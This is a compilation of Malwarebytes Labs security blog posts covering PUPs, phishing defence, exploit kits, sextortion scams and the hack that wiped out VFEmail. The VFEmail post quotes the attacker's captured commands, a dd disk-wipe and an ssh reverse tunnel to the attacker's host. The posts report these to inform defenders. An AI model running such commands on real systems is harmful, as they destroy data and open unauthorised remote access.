Fixed price sales are a bidding bot’s worst enemy, because there’s nothing to gamble. Take it or leave it at the listed price. Some sites will offer a time extension if a last minute bid comes in, which may or may not help ward off the snipers. One of the biggest drawbacks to sniping is you often must hand over login details to the sniping tool. Do you trust it? Is it safe? Can the people who operate the service see your credentials? All of this and more are natural drawbacks to sniping, and could keep your business on top of those grabbing all the best items.

In the digital space of non-tangible goods, bidding and trading also reigns supreme. Sadly, it comes with major risks. Steam, the video game platform juggernaut, offers its own marketplace. There, you can buy all manner of in-game items, cosmetics, game cards, and so on. Some of these items sell for pennies and cents, others fetch hundreds of pounds and dollars.

A short-lived victory

One enterprising individual made a trading bot for the Steam marketplace, and spent some time buying low and selling high across three separate Steam accounts. Ultimately, they amassed game items worth $10,000, which included 2,261 Team Fortress 2 keys.

Valve discovered the botting antics, and subsequently banned all accounts and deleted all the items. Yes, all ten thousand dollars’ worth. This is a clear case of gaming the system and would have also arguably impacted others. While this may have caused a few people to grab some items at a lower price, overall, it’s tough to call this one an example of a good bot (except maybe for the creator).

Bots by any other name

Most of our examples are essentially quite crude bots, living out their days simply sniffing the web or making the occasional product bid. There’s a big push for bots on your devices instead of scouring the web, mostly in the form of personal digital assistants. To a large degree, any regular mobile device does a lot of this anyway (Ahem, hi Siri!). Personalising said tasks and wrapping them up under a friendly interface is the name of the game.

As with other bot types, much of the information you’ll come across online is aimed at the bad stuff. That’s fine—it’s usually easier to spot things getting up to no good than invisible processes ticking along in the background harming nobody. Even so, plugging “mobile bots” into Google brings back nothing but bad bots, mobile game hijacks, scams, and more bad stuff. There are a few hints as to how this new realm of bot may play out as a force for good, including some outside of the mobile world, that illustrate the positive directions botting could move in.

While the word “bot” may never quite shake its negative associations, it’s absolutely worth revisiting and re-evaluating the next time your work colleagues mention a cool new bot program they’ve been assigned. Who knows, you may even give them some helpful suggestions to get the ball rolling.

The post Good bots, bad bots: friend or foe? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 11 – 17)

Malwarebytes - Mon, 02/18/2019 - 16:30

Last week on Malwarebytes Labs, we discussed the return of the sextortion Bitcoin scams, gave you an early overview of the exploit kits of winter 2019, covered the destruction of the VFEmail service, asked consumers whether they should remove themselves from social media, and, for businesses, discussed implementing an anti-phishing plan and the concept of whole team security to relieve overworked IT departments.

  • Security researchers have found that Intel’s Software Guard Extensions (SGX) don’t live up to their name. In fact, they can be used to hide pieces of malware that silently masquerade as normal applications. (Source: The Register)
  • A targeted phishing campaign is underway that states your email has been blacklisted and then asks you to confirm it by entering your credentials. For some reason, this campaign is using phishing links that can contain almost 1,000 characters. (Source: BleepingComputer)
  • Malicious actors have been hacking WordPress websites by exploiting vulnerabilities in a fairly popular plugin called WP Cost Estimation & Payment Forms Builder. Developed by Loopus, the plugin allows WordPress website administrators to create cost calculators and payment forms. (Source: SecurityWeek)
  • The Emotet Trojan, a thorn in the side of financial institutions and your average individual alike, is back with new techniques and an upsurge in attacks. In recent campaigns malicious documents containing Emotet are being distributed via URLs hosted on threat actor-owned infrastructure as well as traditional spam email attachments. (Source: ZDNet)
  • In the weeks leading up to Valentine’s Day 2019, researchers noticed a new form of GandCrab appearing in romance-themed emails. Hackers love the holidays, and Valentine’s Day is no exception. (Source: DarkReading)
  • New research published by the International Computer Science Institute in California suggests that at least 17,000 Android applications are creating permanent records of your online activity for advertising purposes even when you ask for such information to be forgotten. (Source: ZDNet)
  • Microsoft booted eight malicious apps from its official desktop and mobile app store after researchers found the programs surreptitiously mined for Monero cryptocurrency. All these apps were likely developed by the same person or group. (Source: ThreatPost)
  • A new phishing attack bent on stealing Facebook credentials has been spotted – and it’s turning researchers’ heads due to how well it hides its malicious intent. The status bar, navigation bar, shadows and content were perfectly reproduced to look exactly like a legitimate login prompt. (Source: ThreatPost)
  • Jeff Bezos became the most famous and powerful person to claim to be a victim of sextortion, the term often used to describe the otherwise underreported cases of extortion using intimate or sexually explicit photographs or videos. (Source: Wired)
  • Malta’s leading bank resumes operations after a cyberheist-induced shutdown. The Bank of Valletta, which went dark for a day after the fraudulent transfers of €13 million, is now looking to get the money back. (Source: WeLiveSecurity)

Stay safe, everyone!

The post A week in security (February 11 – 17) appeared first on Malwarebytes Labs.


Crack hunting: not all it’s cracked up to be

Malwarebytes - Mon, 02/18/2019 - 16:00

People sometimes ask us in the forums if a keygen or software crack is safe to use. Sometimes, these programs do what they say on the tin. Other times, they’re not what they say they are. In this post, I’ll describe what happened when I went crack hunting, and why it is often unsafe to carry out this activity.

Researchers like myself often browse crack and keygen sites because they are known to host many affiliate links to third-party applications, many of which include Potentially Unwanted Programs (PUPs), adware, or worse. Many of these sites also host downloads for malware.

These sources are important to research because users often browse crack and keygen sites looking to find paid software for free. This is a risky practice, though, because the user may end up downloading unwanted software that can do more harm than good.

In this case, I was looking for a crack for Windows 10 Pro, since it’s popular software. The crack download itself was actually not a crack, but a file we detect as PUP.Optional.InstallCore.Generic. This “crack” did not run properly on my test machine, most likely because of sandbox sensitivity.

While the “crack” was being downloaded, the download page redirected to a page advertising DriverFix. The advertisement is one of many adverts offered by ad rotators.

I clicked on the link, which in turn opened the following site:

Clicking the “download now” button downloaded the file from the DriverFix site and delivered basic instructions on how to get the program to run.

According to the website, DriverFix is a Windows application that scans your machine to find outdated drivers, and allows users to update those drivers from within the application with one click. So I tried it.

Once the software was installed, it automatically launched, ran a scan, and displayed the results of the scan. Here are results from two different machines. Notice the results show drivers as being “Extremely old.”

This gives users the false idea that their machine has issues that must be fixed. When I expanded the info for my batteries and checked, there were indeed newer drivers available, though calling my drivers “extremely old” is a bit of a stretch.

When the user attempts to “update all” or update one driver, they are presented with a pricing page to pay for the services to update their drivers.

The user then has the choice to update one driver, update all drivers on their system, or purchase the “family pack,” which will update as many as three PCs. Many users will opt out of purchasing the services at this point.

This is where things get hairy. One does not have to buy new drivers. In my case, all I did was Google the driver description “Microsoft ACPI-compliant control method battery driver Windows 10” and found results right from the Microsoft Update Catalog site.

If this proves to be difficult for the not-so-tech-savvy folk, you can also open Device Manager, expand the driver in question, open the Driver tab, and click “Update Driver.” Microsoft will download the driver your system needs at no cost. Plus, you can be sure it is coming from Microsoft.

If the user decides not to purchase and simply closes DriverFix, eventually they end up with warning messages from DriverFix regarding their outdated drivers when they do anything on their machine that uses the drivers flagged in the initial scan. Below is the notification I received from DriverFix when I was saving a file to my machine.

This is not typical behavior from benign software. This behavior is designed to scare the user into thinking they have severe issues that will only be solved by purchasing services from DriverFix.

This is after the user might have thought they were getting a free product that promised to fix driver issues in one click when they ran into the initial advertisement.

Unless your machine is very old, Microsoft provides compatible drivers, or the computer manufacturer automatically provides driver updates through its own built-in software at no cost.

Between discovery of this program on December 19, 2018 and January 9, 2019, the installer for this product has been detected 3,245 times by Malwarebytes. There have also been 839 reported traces detected as a result of installs during the same time frame.

Malwarebytes blocks the website that hosts DriverFix downloads, and stops the application installer from launching.

We detect the application as PUP.Optional.DriverFix.

If you installed DriverFix, we have instructions on how to remove it or how to add exclusions if you decide to keep it.

As long as sites continue to push cracked software that seems too good to be true (and is thus actually harmful to users), we will continue to detect such programs in order to protect our customers.

And for those looking for the silver bullet software in crack or keygen sites, we suggest making sure you can spot benign programs from those that try to squeeze a few bucks out of unsuspecting users. Exploring these sites is not for the uninitiated—best to stick to tried and true, legitimate versions of software programs instead of risking illegal crack or keygen sites and programs.

The post Crack hunting: not all it’s cracked up to be appeared first on Malwarebytes Labs.


Tackling the shortage in skilled IT staff: whole team security

Malwarebytes - Fri, 02/15/2019 - 16:40

Is your IT department understaffed and overworked, and are you looking for reinforcements in vain? Maybe these hard-to-hire reinforcements can be found from within, rather than having to outsource or hire expensive, short-term extra help. While this was usually only done if your own staff was falling too far behind, the burden of the shortage of skilled IT staff in the workforce is starting to take its toll, and this is now a viable option for all.

Undoubtedly, there is a person in every group who is more computer-savvy than the others: the one who can end your problem or answer your question in seconds, when it would take hours, if not days, to get someone from the IT department to look at it. These people shield the IT department from several questions each day, and keep at bay frustrated end users who had given up asking the overwhelmed crew for help and assistance.

Nevertheless, professionals often frown upon the help given by these helpful troubleshooters on the floor level. How can we ensure that the help given by these often self-appointed volunteers is nothing short of the first-tier support provided by the IT department?

Pros and cons

First of all, make sure that your IT staff is willing to share their responsibilities with people on the work floor. Without their full cooperation, this plan is destined to fail. We can all agree that trained and weathered IT professionals will generally do a much better job than people who have been trained for other jobs. But if you are facing the same problem as most companies and you just can’t hire enough IT professionals, you will probably welcome all the help you can get. And having to rely on a frustrated and overworked IT staff might be worse than letting volunteers that feel recognized and empowered help in any way they can.

On the other hand, “any way they can” might just turn out to be the problem with this solution. It should be made crystal clear when the volunteers are expected to call in the help of the professionals. You do not want to face some catastrophe because one of the benevolent volunteers Googled a half-baked solution for a problem that was reported to them.

This whole team security strategy fits nicely in the ongoing shift to BYOD, and even Bring Your Own Security (BYOS). Generally speaking, it will make your employees happier, but it takes some planning and attention to make sure it also works for the company as a whole.

BYOD strategy

One important thing to consider is whether the company has adopted a user-centric or device-centric approach to technology integration. If every user is equipped with a device according to their personal preference, there could be a multitude of devices in use. This can be frustrating enough for a trained professional to deal with, let alone a volunteer who is about to find out that everything works just a little bit differently on their colleagues’ devices.

Determine at the outset the composition of your technology and workforce, and you can better structure a plan for your volunteers—and your IT staff, too.

Education and training

Training your entire staff in security basics will certainly result in less work for your IT staff. And while providing your employees with security awareness training is a good and necessary start, you can bolster support for your IT team by offering additional IT and security training to those who are interested. There are lots of useful training programs that deal with common issues found in the software that your employees are using on a daily basis. And if the trainee is motivated and interested (as we would expect from these volunteers), it shouldn’t take up a large amount of their time.

In addition to training, you’ll also want to set up a system of rewards for your volunteers, whether that’s monetary compensation, company swag (for example, custom hoodies designating them as IT helpers), or other perks. While many volunteers may be happy to help out of the goodness of their hearts, giving them additional incentive will only strengthen their commitment and attract others to the team.


Once the volunteers have received proper awareness training, equip them with the tools and authority to help their peers and make sure the rest of their department knows that they have been properly trained and can be asked for help with certain issues. This way, the people in that department are comfortable with asking for their help and will know when they can go to them instead of IT.

What this means: Volunteers will need access to certain software, systems, or cloud-based services. They’ll also need a way to communicate their actions to the IT team, so they’re aware of minor issues, even if they didn’t have to fix them themselves. Do they develop a ticketing system? Do they integrate with the current system for reporting issues? Do they spend an hour at the help desk?

No matter how you decide to enable your volunteer staff, make sure that they understand the consequences of their actions. Don’t tell them to “just do this” without explaining why you want it done that way. Give them some background so they can build out their expertise and learn how you want to run things.


Another important step is to give volunteers the administrative powers to make the actual changes themselves. With the ongoing uptick in Bring Your Own Device (BYOD) policies, most of these users have learned how to make the necessary changes to their own devices, and how to troubleshoot some of the more common issues. They may even have some specialists outside of the company that they turn to when there are problems with the device that they consider their own.

One caveat: Make sure that the volunteer is informed about the risks of combining work and personal information on the same device—and what the consequences are if they don’t adhere to company policies. As always, clear communication is a key to success. Make sure everyone is aware of what is expected of them, and what they can expect in return.

Points of attention

Finding the right people to assist your IT staff with easy-to-fix issues or simple roll-outs can make your employees happier. The IT staff can concentrate on problems that are more challenging and don’t have to run around like headless chickens playing whack-a-mole for every minor problem, like users who just need to reboot, haven’t turned on the power, or are holding the mouse upside-down. Meanwhile, your volunteers will feel that their helpful attitude has paid off, and they are now officially allowed to help their peers.

The volunteers will need the training, tools, permission, and rewards to perform their new tasks. But, and we cannot stress this enough, they will also have to be informed about their boundaries. You don’t want to see them go overboard because they are reluctant to admit that something is over their head. Remember that difficult problems may show up as minor issues at first. So empower them to help, but make sure they know when to step aside. That way, the whole team can keep your organization secure.

The post Tackling the shortage in skilled IT staff: whole team security appeared first on Malwarebytes Labs.


Should you delete yourself from social media?

Malwarebytes - Thu, 02/14/2019 - 17:30

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook experienced a security breach that impacted 50 million accounts, was responsible for a genocide incited using its platform, kept user data it said it deleted, and was caught abusing Apple development apps to test on children. Twitter, meanwhile, has not only been on the receiving end of password bugs, hacks, and data breaches, but some could say is, these days, a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been the recipient of phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the cord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do, even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies. Next, here’s a quick and dirty list of links to follow in order to adjust privacy settings across the top four social networking platforms:

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, either for the purpose of time management, focus, or beating social media addiction. As more and more of our media consumption moves to smart phones, you can leverage several apps that will help you achieve these goals. These include:

Goodbye, top four!

Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.


Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.


Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.


Time to permanent deletion: Immediately!


Time to permanent deletion: 30 days


Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, here’s what to do:

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the reasons we enjoy social media may also be the reasons why regular consumers should take a beat and consider the benefits.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.


Hacker destroys VFEmail service, wipes backups

Malwarebytes - Thu, 02/14/2019 - 16:56

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether worse. Put simply, it was the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:


!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note: mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, log in to Horde, create any folders you need.

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be usable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.


Did they put word out on social media?

You bet they did, and the Tweets don’t make for pleasant reading:

This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.

— (@VFEmail) February 11, 2019

Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@ -R -N

— (@VFEmail) February 11, 2019

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expressions. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.

— (@VFEmail) February 11, 2019

All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:

Yep, but it doesn't matter. They just formatted everything.

— (@VFEmail) February 11, 2019

They also managed to destroy various VMs using different forms of authentication.

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— (@VFEmail) February 11, 2019

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime.

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Businesses: It’s time to implement an anti-phishing plan

Malwarebytes - Wed, 02/13/2019 - 16:54

Businesses: phishers aren’t just coming for you. They’re coming for your employees and your customers, too.

Phishing attacks are on the rise this year, thanks in part to massive Emotet and TrickBot campaigns, which make use of phishing emails to deliver their payloads. If you don’t already have one in place, then it’s time to implement an anti-phishing plan.

Where phishes are concerned, it doesn’t matter if the technique being used is revolutionary or old hat. Somebody, somewhere is going to fall for it. It’s up to you and your employees to ensure that your business is secure, and that your customers are performing safe email practices, too.

If your customers are logging into fake portals, eventually they’re going to tie up your support channels asking for help, refunds, reorders, and more. If your employees are being stung, they open the door to data theft, network infiltration, ransom demands, spying, and a massive dent in your company’s reputation to boot.

All of these are poor directions to head in. So let’s first take a look at some of the targets of phishing campaigns. Then, we’ll talk about what your employees and customers can do to identify a phish.

Targets for phishers

The 2018 Phishing Trends & Intelligence Report (PDF) from PhishLabs stated that Email/Online Services were the top targeted industry in the second half of 2017 by a margin of 26.1 percent, with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages.

Office 365 is enormously popular for businesses, with Microsoft revealing in 2016 that it has:

  • 60 million active commercial customers
  • 50,000 small business customers added every month
  • 340 million downloads of its mobile app

As our 2019 State of Malware report shows, there’s no real sector of industry left alone by malware attackers. Trojans (which include Emotet and TrickBot) lured in targets in manufacturing, education, and retail in 2018 with phishing emails. And ransomware, which is also a popular payload of phishing attacks, crippled organizations in government, as well as education, manufacturing, and retail.

Outside of those verticals, however, phishers know that every business is sitting on something juicy: personally identifiable information (PII). Just about any organization in any vertical is sitting on databases of customer names, emails, and their payment details.

That’s a huge number of potential targets at which to aim.

What should we do?

While it’s nearly impossible to predict every threat model, or what an attacker may want with your company’s data, you can better thwart phishing attacks by putting in place a clear anti-phishing plan. There’s never been a better time to start beefing up your cybersecurity policy for employees, as well as update your website with solid anti-phishing tips for your customers.

If you’re short of a few ideas on how to help your employees and customers identify phishing attempts, we have a handy introductory list below.

Anti-phishing tips for your employees
  1. Attachments aren’t always a guarantee of malware. Often, phishers will send perfectly clean files as an additional confidence trick. “Please fill this in and send it back,” they’ll say. Having said that, many phish campaigns will happily try to backdoor a network with a rogue file alongside a phish attempt. When in doubt, do not open the file. Instead, try to contact someone you know from the organization listed in the email to confirm.
  2. Mobile devices are particularly at risk from lengthy scam URLs, as the visible portion may be tailored to appear legitimate, but the rest of it—which would give the game away—is hidden offscreen. Employees checking email on their phones or browsing the Internet should always review the whole URL before clicking. If it looks suspicious, or uses numbers or peculiar letters in place of what you’d expect to be there, it’s best to leave immediately.
  3. Dubious apps are also a potential problem, so it’s best to review apps you plan to install on your work mobile device or desktop with a hawk eye. Are the logos the same? Does the user experience match what you’d expect?
  4. Promoted content on social media can lead to phishing, and it’s worth advising all employees and customers to be wary of this—especially as ads tend to be targeted to your interests (thanks, trackers). While you may not want to prohibit use of social media at work entirely (especially as it’s part of the job for many folks in marketing), recommending that users not engage on social media from work devices, or limiting their engagements to work-specific tasks, could help thwart phishing attempts.
  5. Bit of a niche one, but you may wish to advise employees not to waste spammers’/phishers’ time with any of these tactics during work hours. Using personal accounts is all fun and games, but replying with anything work-related could go terribly wrong. The bad guys know your work mail exists for one thing, and they’ll either spam it hard, send you more junk, or go after your business even more than they were already.
Anti-phishing tips for your customers
  1. Look at some anti-phish pages from the biggest brands. You’ll notice that they all mention the most obvious forms of attack. If you’re eBay, you’re going to see customers sent fake auction missives, or “problem with your auction” attacks. If you’re Steam, it’ll be “problems with your marketplace item” or free game keys. A bank? It’ll be bogus re-authentication mails. For Apple, it’ll be issues with pending refunds for items they don’t remember purchasing. This is how you should lead the charge.
  2. Point out that the presence of a padlock isn’t a guarantee the site they’re on is real. Certificates for websites are easily obtained for free these days, and scammers are taking full advantage of it. It may have been useful to tell people “Avoid sites with no padlock because it isn’t real” years ago, but the game has changed and so must our messaging.
  3. Warn them about bad spelling, errors in formatting, and email addresses in the “From” field which look suspicious. Also mention that many phishers spoof mails in the “From” field so this isn’t a guarantee of safety either. Perhaps the formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. The possibilities are endless.
  4. Desperation is a surefire sign that something may be wrong. It’s panic buying, but not as we know it. Emails claiming a tight time limit to login and perform an action, alongside the threat of losing X or Y forever, is a good sign of bad things afoot.
  5. Warn them off emails asking for additional personal information (and if your organization sends such emails, try to wean yourself off this practice, too). Links to sites asking for logins are bad practice. Train your customers and employees out of this habit. If they won’t click links asking for information, the battle is halfway won.
  6. The URL shown on the email and the URL that displays when you hover over the link are different from one another. An oldie, but goodie.
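Employee tip 2 and customer tip 6 both come down to comparing the URL a reader sees with the one the link actually leads to, and customer tip 2 is why the check below deliberately ignores whether a link uses https. This is an added example, not Malwarebytes code; it runs over a constructed HTML email body, and the brand list and digit-for-letter table are illustrative assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed HTML body in the style of a phishing email; made up for this example.
SAMPLE_HTML = """
<p>Your account will be closed in 24 hours unless you verify it now.</p>
<a href="http://login-micros0ft.example/verify">https://login.microsoft.com/verify</a>
<a href="https://support.example.com/help">https://support.example.com/help</a>
<a href="http://paypa1-secure.example/login">Confirm your PayPal account</a>
"""

# Illustrative assumptions: brands to watch for, and digit-for-letter swaps to undo
# (0->o, 1->l, 3->e, 5->s). Ordinary numbered hosts like mail2.example.com are untouched.
LOOKALIKE_BRANDS = ("microsoft", "paypal", "apple", "ebay", "steam")
DIGIT_SWAPS = str.maketrans("0135", "oles")


class LinkExtractor(HTMLParser):
    """Collect (visible text, href) pairs from every <a> tag."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def check_link(text, href):
    """Return the reasons a link looks like a phish; an empty list means no finding.
    The scheme is not a signal on purpose: a padlock no longer proves a site is real."""
    reasons = []
    real_host = host_of(href)
    shown_host = host_of(text) if text.lower().startswith(("http://", "https://")) else ""
    if shown_host and shown_host != real_host:
        reasons.append(f"displayed host '{shown_host}' differs from real host '{real_host}'")
    plain_host = real_host.translate(DIGIT_SWAPS)
    if plain_host != real_host:
        reasons.append("digits used in place of letters in hostname")
    for brand in LOOKALIKE_BRANDS:  # brand name present, but not on the brand's own domain
        if brand in plain_host and plain_host != f"{brand}.com" \
                and not plain_host.endswith(f".{brand}.com"):
            reasons.append(f"lookalike of brand '{brand}' on an unrelated domain")
    return reasons


def analyse(html):
    """Run check_link over every anchor in an HTML email body."""
    parser = LinkExtractor()
    parser.feed(html)
    return [(href, check_link(text, href)) for text, href in parser.links]


if __name__ == "__main__":
    for href, reasons in analyse(SAMPLE_HTML):
        print(href, "->", reasons or "no findings")
```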
My business uses Office365, what else can I do?

Microsoft has a handy list of security suggestions for you to deploy on your network. Suggestions include:

And finally

Google has come up with a short, fun, and difficult anti-phishing test. It’s a fantastic way to experience some common phishing techniques safely. There aren’t many ways to experience real phishing examples in a safe environment, so it’s well worth having a go. You’ll likely find that there’s a few tactics in there you haven’t seen before, and it’s always a good idea to test your employees on some left-field phishing techniques. However you choose to go about putting together an anti-phishing plan for your organization, we wish you many years of safe emailing ahead.

The post Businesses: It’s time to implement an anti-phishing plan appeared first on Malwarebytes Labs.


Exploit kits: winter 2019 review

Malwarebytes - Tue, 02/12/2019 - 16:00

Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.

In addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.

Winter 2019 overview
  • Fallout EK
  • RIG EK
  • GrandSoft EK
  • Magnitude EK
  • Underminer EK
  • GreenFlash Sundown EK

Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878 continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash CVE-2018-15982.

Fallout EK

Fallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new features and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add CVE-2018-15982, a more recent vulnerability for the Flash Player.


RIG EK

Good old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for Fobos. There haven’t been any notable changes to report since we last reviewed it.

GrandSoft EK

GrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.

Magnitude EK

Meanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.

Underminer EK

Underminer’s over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It’s worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published (CVE-2018-15982), Underminer was already implementing it.

GreenFlash Sundown EK

Also a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.


While timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it’s still highly adopted in Asian countries—which explains why they are currently being targeted.

Malwarebytes’ anti-exploit technology blocks each of these exploit kits—Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown—before they even have a chance to drop their payload.

As we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.

The post Exploit kits: winter 2019 review appeared first on Malwarebytes Labs.


Sextortion Bitcoin scam makes unwelcome return

Malwarebytes - Mon, 02/11/2019 - 18:38

Heads up: a particularly nasty sextortion Bitcoin scam from at least the middle of 2018 is making the rounds once again.

The scam involves making use of old breach dumps, then emailing someone from the list and reminding them of their old password.

When something lands in your mailbox with “Hey, remember this?” it’s a surefire way to focus the reader’s attention. Pressure is then applied to start sending over some Bitcoin…or else.

What is the threat being made?

The generally accepted theory is that the scammer digs up personally identifiable information from old data breaches, including email addresses and passwords, plugs it into some sort of automated script, and then fires out thousands of emails.

Those mails reach people from said breach, and they then see talk of somebody “knowing” their login details. That’s then used as leverage to claim the attacker has access to their PC, files, folders, webcams, browsing history—in a nutshell, anything personal and sensitive. The scarier they can make it sound, the better. In fact, one of the more eye-popping claims is that the scammer has video of the user viewing adult websites, and they will share this video with all the user’s contacts unless they pony up and pay a Bitcoin ransom.

And in classic ransomware fashion, there’s typically a ticking clock. Giving users a short time limit to deliver the payment is social engineering at its finest.

What next?

The recipient may well have a panic attack, that’s what. To be suddenly confronted with an ancient (but potentially still active) password is certainly going to give a bit of a shock to the system. It’s at this point the confusion sets in, as they start to wonder what on Earth the attacker has. Did they really see what they claimed to see? Do they actually have video footage? What other potentially embarrassing (or worse) content could they use to extort and blackmail?

What do they really have?

A large throne of lies, is what.

Yes, they have your password from a long time ago.

No, they do not have access to your computer. And no, even if you were checking out adult sites, they don’t have video of you doing so.

What they might have is access to your email account associated with the breach, if you haven’t changed the password since it took place. They could also potentially start trying to log into other accounts you have with the same password. If this is the case, you should fire up a password manager and get to work changing things.

In fact, you should do that if you share passwords across accounts in any case.

Okay, back to the scam.

What does the email say?

It’s a fairly standard template, and hunting for portions of the below mail will throw up any number of hits in Google and other search engines.


The email reads as follows:

